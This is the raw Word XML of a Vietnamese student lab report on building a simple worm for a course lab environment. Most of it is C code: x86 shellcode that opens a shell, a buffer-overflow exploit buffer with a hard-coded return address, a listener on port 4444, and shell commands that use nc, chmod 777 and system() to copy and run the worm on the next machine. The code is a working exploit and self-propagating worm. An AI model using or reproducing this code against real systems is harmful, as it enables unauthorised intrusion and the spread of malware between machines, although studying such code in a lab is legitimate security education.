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2F83739F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544677">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cơ chế hoạt động của mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DD5544" w14:textId="76594201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</w:t>
      </w:r>
      <w:r w:rsidR="00EC23EE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16956">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (Session 0</w:t>
      </w:r>
      <w:r w:rsidR="00EC23EE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16956">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1256D11A" w14:textId="05D79DA6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EC23EE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Simple worm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>Nghi Hoàng Khoa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611CFD60" w14:textId="7529A711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EC23EE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00EE72EC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00EE72EC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>03</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/2</w:t>
      </w:r>
      <w:r w:rsidR="00EE72EC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FCEAD3" w14:textId="598315C0" w:rsidR="00B16956" w:rsidRPr="00787643" w:rsidRDefault="00B16956" w:rsidP="00B16956">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787643">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Nhóm: 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482BE31C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r w:rsidR="00EE72EC" w:rsidRPr="00EE72EC">
        <w:t>NT230.N</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EE72EC" w:rsidRPr="00EE72EC">
        <w:t>21.ANTN</w:t>
      </w:r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3246"/>
        <w:gridCol w:w="2414"/>
        <w:gridCol w:w="3294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3FD2E0E4" w:rsidR="008D0072" w:rsidRDefault="003C2417" w:rsidP="00FF12B3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>Võ Anh Kiệt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2431" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F74B605" w14:textId="0F8090E0" w:rsidR="008D0072" w:rsidRDefault="003C2417" w:rsidP="00FF12B3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8" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69359CA4" w14:textId="6F794066" w:rsidR="008D0072" w:rsidRDefault="003C2417" w:rsidP="008D0072">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>20520605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1C179A3C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2431" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0731347F" w14:textId="0CD653DA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3298" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="236D4D96" w14:textId="5242AC61" w:rsidR="008D0072" w:rsidRDefault="008D0072" w:rsidP="00FF12B3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
            </w:pPr>
            <w:r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721AA0E0" w:rsidR="0027532A" w:rsidRDefault="0027532A" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Kịch bản </w:t>
            </w:r>
            <w:r w:rsidR="00FA0470">
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="0059710E">
              <w:t>3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6EC9E76E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9271EF6" w14:textId="0AC2D09E" w:rsidR="0027532A" w:rsidRPr="00B00619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4389E5C2" w14:textId="70892BD1" w:rsidR="0027532A" w:rsidRPr="004067CC" w:rsidRDefault="0027532A" w:rsidP="004A55AE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1D87D3EC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E3A8CC4" w14:textId="105810C3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7CD217D1" w14:textId="01828109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140119D4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494421D3" w14:textId="538798E3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684CDDA" w14:textId="4B72A510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094899EF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CA48FA5" w14:textId="15E9C74A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C6C7EBA" w14:textId="3B910691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F9BD5DB" w14:textId="2C968C04" w:rsidR="00F13188" w:rsidRDefault="007D281E" w:rsidP="00F13188">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kịch bản </w:t>
      </w:r>
      <w:r w:rsidR="00FA0470">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="007D5063">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70096F6A" w14:textId="73D860EA" w:rsidR="00F84406" w:rsidRDefault="007D5063" w:rsidP="00BA539D">
      <w:r>
        <w:t>Nguồn tham khảo: ChatGPT</w:t>
      </w:r>
      <w:r w:rsidR="003E1444">
        <w:t xml:space="preserve"> (ChatGPT chỉ hỗ trợ hướng làm, hoàn toàn không có code mẫu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4589BF" w14:textId="74D11963" w:rsidR="007D5063" w:rsidRDefault="007D5063" w:rsidP="00BA539D">
      <w:r w:rsidRPr="007D5063">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F3E19C" wp14:editId="7AC1B887">
            <wp:extent cx="6115050" cy="344932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DF08" w14:textId="7F0581A6" w:rsidR="007D5063" w:rsidRDefault="007D5063" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Và với hướng dẫn của thầy, </w:t>
      </w:r>
      <w:r w:rsidR="00E33AA4">
        <w:t>ta sẽ thực hiện việc lây nhiễm bằng cách, thực hiện leo vào máy 2 sau đó lây nhiễm sang máy 3 có 2 cách:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C924559" w14:textId="333105EA" w:rsidR="00E33AA4" w:rsidRDefault="00E33AA4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Cách 1: sau khi lây nhiễm máy 2 thì ta sẽ thực hiện cố định một ip máy 3 để tự động worm leo sang (đã biết ip từ trước)</w:t>
      </w:r>
      <w:r w:rsidR="00714D6C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16568100" w14:textId="03797A1C" w:rsidR="003371FA" w:rsidRDefault="00E33AA4" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Cách 2: Sau khi lây nhiễm máy 2 thì ta sẽ thực hiện scan các ip có trong subnet mà máy ta đã lây nhiễm, từ đó thực hiện việc lan truyền </w:t>
      </w:r>
      <w:r w:rsidR="003371FA">
        <w:t>tự động</w:t>
      </w:r>
      <w:r w:rsidR="009637A3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9361C4" w14:textId="569E18A1" w:rsidR="003371FA" w:rsidRDefault="003371FA" w:rsidP="00BA539D">
      <w:r>
        <w:t>Ở đây, ta sẽ chọn cách 1 do đã được cung cấp thông tin từ ip máy 3 trên vlab để thực hiện</w:t>
      </w:r>
      <w:r w:rsidR="003A6B19">
        <w:t>. Việc thực hiện truyền worm ta sẽ thực hiện bằng lệnh “nc” với chức năng gửi và nhận file để thực hiện lây nhiễm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A23C0F1" w14:textId="091F9590" w:rsidR="003A6B19" w:rsidRDefault="003A6B19" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Đầu tiên ta sẽ thực hiện cải tiến code: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB96319" w14:textId="0828287E" w:rsidR="003A6B19" w:rsidRDefault="003A6B19" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Ở câu C2 ta đã lây nhiễm được được một máy và ta thực hiện chỉnh hàm main thành hàm Exploit và thực hiện code thêm 1 hàm lây nhiễm là hàm Infect, ngoài ra để </w:t>
      </w:r>
      <w:r w:rsidR="00C91C54">
        <w:t>gọi port ta sẽ sử dụng thêm hàm listen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4157B412" w14:textId="786B167A" w:rsidR="003A6B19" w:rsidRDefault="003A6B19" w:rsidP="00200944">
      <w:r>
        <w:t>Dưới đây là đoạn code của chương trình: (phần giải thích các hành động được trình bày trong chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FA8EC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C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>#include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&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4376A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C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#include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&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2AC35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C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#include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&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C95047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C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#include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&lt;netdb.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD9795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C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#include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&lt;netinet/in.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410FC65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539782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shellcode1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[]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31\xc0\x31\xdb\x31\xc9\x51\xb1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58C3945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06\x51\xb1\x01\x51\xb1\x02\x51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21E801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89\xe1\xb3\x01\xb0\x66\xcd\x80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472575F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89\xc2\x31\xc0\x31\xc9\x51\x51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032C06C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B8\x1B\x40\x11\x17\x35\x11\x11\x11\x11\x50\x31\xC0\x66\x68\x11\x5c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4B0D166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"\xB9\x11\x11\x11\x11\x81\xF1\x1B\x40\x11\x17\x51\x31\xC9\x66\x68\x11\x5c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5020340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b1\x02\x66\x51\x89\xe7\xb3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E7992A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10\x53\x57\x52\x89\xe1\xb3\x03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8FC699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b0\x66\xcd\x80\x31\xc9\x39\xc1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266B73A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74\x06\x31\xc0\xb0\x01\xcd\x80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03400D6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31\xc0\xb0\x3f\x89\xd3\xcd\x80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4B4E21E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31\xc0\xb0\x3f\x89\xd3\xb1\x01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0F7832D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cd\x80\x31\xc0\xb0\x3f\x89\xd3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143B70E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b1\x02\xcd\x80\x31\xc0\x31\xd2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DD2501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50\x68\x6e\x2f\x73\x68\x68\x2f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3857E23E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2f\x62\x69\x89\xe3\x50\x53\x89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E8F347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e1\xb0\x0b\xcd\x80\x31\xc0\xb0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6DCD88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01\xcd\x80</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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116B935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6FFC0B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shellcode2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[]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31\xc0\x31\xdb\x31\xc9\x51\xb1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C9176C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06\x51\xb1\x01\x51\xb1\x02\x51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386E75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89\xe1\xb3\x01\xb0\x66\xcd\x80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965EB38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89\xc2\x31\xc0\x31\xc9\x51\x51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5FD8B7F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B8\x1B\x40\x11\x16\x35\x11\x11\x11\x11\x50\x31\xC0\x66\x68\x11\x5c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ADD844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"\xB9\x11\x11\x11\x11\x81\xF1\x1B\x40\x11\x17\x51\x31\xC9\x66\x68\x11\x5c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F280BB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b1\x02\x66\x51\x89\xe7\xb3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E56D56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10\x53\x57\x52\x89\xe1\xb3\x03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445D3C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b0\x66\xcd\x80\x31\xc9\x39\xc1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5D9F01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74\x06\x31\xc0\xb0\x01\xcd\x80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4DBFBF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31\xc0\xb0\x3f\x89\xd3\xcd\x80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365F191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31\xc0\xb0\x3f\x89\xd3\xb1\x01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9533F4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cd\x80\x31\xc0\xb0\x3f\x89\xd3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09AF8D8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b1\x02\xcd\x80\x31\xc0\x31\xd2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2ED4CB3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50\x68\x6e\x2f\x73\x68\x68\x2f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34848A5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2f\x62\x69\x89\xe3\x50\x53\x89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5BBB2C0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e1\xb0\x0b\xcd\x80\x31\xc0\xb0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3693EF6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01\xcd\x80</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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64539EA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6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// standard offset (probably must be modified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB3A6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C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>#define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 xml:space="preserve"> RET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xbffff28b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFC35F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C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#define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 xml:space="preserve"> BUFFER_SIZE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024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE452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C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#define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 xml:space="preserve"> NAME_SIZE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2048</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549ED00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C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#define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 xml:space="preserve"> BUF_SIZE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064</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9EF8C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CBBB80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6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>//global variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588F993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sockaddr_in my_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srv;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17F5C76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162325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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1024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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF0380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signal = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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7CA31EF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*ip_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victim;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18E6E3B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socket_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server;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6CB98C3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2544D31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6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// exploit function to send buffer to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6269A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Exploi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ip_victim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port_victim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467B044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785FF9DF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declare variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1501D74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finish declare variables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2AD5F0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exploit_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00162325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[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>BUF_SIZE];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5023FA1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s, i, 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size;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0F3D4C8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hostent *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host;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3DAE76B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sockaddr_in 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remote;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="690C4A5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78D47A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filling buffer with NOPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2203575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generating exploit buffer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539A35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memse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exploit_buffer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x9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, BUF_SIZE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3CA73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4E8863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signal ==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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377272AE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exploit_buffer +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90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-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(shellcode1), shellcode1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(shellcode1) -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CA6509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536F2A8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els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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABEEC7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exploit_buffer +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90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-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(shellcode2), shellcode2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(shellcode2) -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983256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773F419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</w:p>
    <w:p w14:paraId="50C39E1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finish copying shellcode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B948B3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Copying the return address multiple times at the end of the buffer...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAE3D1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36A492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adding return address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F849CE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fo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i =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90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; i &lt; BUF_SIZE -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4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; i +=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4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4D83436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3FBE5E6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*((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*)&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit_buffe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[i]) = RET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05394D6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025BE93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exploit_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00162325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[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BUF_SIZE -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] =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x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1B0E0F8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finish adding return address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575E11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64931A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create hostname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102CF0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getting hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CC0C1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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    host = </w:t>
      </w:r>
      <w:r w:rsidRPr="00162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gethostbynam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ip_victim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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="35F8A71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F2E39C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create socket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B6B51C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 xml:space="preserve">// creating </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2CE188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s =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socke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AF_INET, SOCK_STREAM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27D51EF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s &lt;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361277B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7D86D2CF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f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stderr,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Error: Socket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85245A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-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474744F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142E09D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53BF02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create remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2778850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create remote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593F8E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 xml:space="preserve">// state </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Protocolfamily ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> then converting the hostname or IP address, and getting  port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C0282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remot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sin_family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= AF_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INET;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6ED06A0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remot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sin_add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= *((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in_addr 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*)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host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>-&gt;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h_add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C7F9768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remot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sin_por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162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>htons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port_victim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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="55E0521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connect to remote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9BAFA8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connecting with destination host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3528E3C8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connec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>s, (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sockaddr *)&amp;remote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remote)) == -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7CB73CF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1CAB546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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>clos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s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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="73D1F0E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f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stderr,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Error: connect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814711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-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234353C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68F2AE2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send exploit buffer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10FB70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2EC7AF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sending exploit string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1536ABF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size =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send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s, exploit_buffer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(exploit_buffer)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D6F6F0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size == -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6703530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05944A1F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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>clos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s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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="24EC4B4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f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stderr,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sending data failed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81179C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-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71789E1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3B56461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closing socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CC3A9E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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>clos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s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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70F1C42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05FFA0B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3AC5EA3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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>void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Liste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>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B645D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listen to port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA26CD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Listening port 4444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E35B01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3CB07F1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create socket server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A07E24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socket_server =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socke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AF_INET, SOCK_STREAM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B7FB618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D79B8C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check if socket is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B32A2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lastRenderedPageBreak/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socket_server &lt;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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0165BF8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f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stderr,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Error: Socket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770E33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00C9EB5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5D56EBB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A9D5CF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create my_srv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320354D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my_srv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sin_family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= AF_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INET;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="44DB1E1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my_srv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sin_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>add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s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_add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= INADDR_ANY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251E2B9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my_srv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sin_por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htons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B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4444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17B8538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AB279C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bind socket to port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF5B4B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bind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>socket_server, (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sockaddr *)&amp;my_srv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my_srv)) == -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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C235F0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erro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Error: bind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402258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7166818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0484484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listen to port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D587A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liste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socket_server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3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 == -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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C23D4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erro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Error: listen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1B4BECE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1E08B6A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4F54325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C1CB96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announce finish listen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2501974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finish listen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915908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5B56700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6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// infecting function to send buffer to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E15508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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>void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Infec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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>void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pt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32BE3E0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475E723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D50F33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declare variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E434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bytes, client, client_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size;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6DB8595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sockaddr_in cli_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struct;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5447D7A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328663F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announce infection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE77D8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Start infecting the machine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EC709BF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4CDA13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creating socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAF1AC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client =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accep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>socket_server, (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sockaddr*)&amp;cli_struct, &amp;client_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA3A6B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client == -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3040044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22F05E4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erro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Error: accept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A5C83E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4A3D402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2AD2451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</w:p>
    <w:p w14:paraId="5FB0B2E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infection announcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CB5EC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Starting connect from victim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D0071A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251500B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sending shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C844C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buffer,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pwd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0A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5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B03E5F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    bytes =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send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client, buffer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5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F99A30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410E24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bytes &lt;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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C6366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5D22017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7C9FB36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bytes =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recv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client, buffer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(buffer)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5B19F6E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bytes &lt;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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3DF6EE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1636FC9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5685684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[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bytes -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] =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56FD43F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</w:p>
    <w:p w14:paraId="4D24C64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get into dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D7551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Starting the infection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DE7BE7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sleep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B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1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E8227F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24498B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send worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA421E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB4E72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buffer,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nc -l 10001 &gt;c3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0A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7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A14539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bytes =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send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client, buffer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7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8D7262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30DEF098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Sending the worm to exploit the machine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3C0D5E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7DBD5B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send worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A2A79E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s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buffer,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 xml:space="preserve">"nc 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%s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 xml:space="preserve"> 10001 &lt;c3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0A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, ip_victim);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160545F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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>system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buffer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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="63591DD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CD9D10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chmod 777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B34441E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buffer,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chmod 777 c3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0A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4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F261F9F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bytes =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send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client, buffer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4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497DFD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2172329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execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350B8048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buffer,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./c3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0A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6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545113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bytes =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send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client, buffer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6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5B13FC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</w:p>
    <w:p w14:paraId="4BE84088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close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280084B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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>clos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client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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="36EF214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0EDBF29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26F5556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mai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argc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argv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[]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2CD946A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2677408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declare variables</w:t>
      </w:r>
    </w:p>
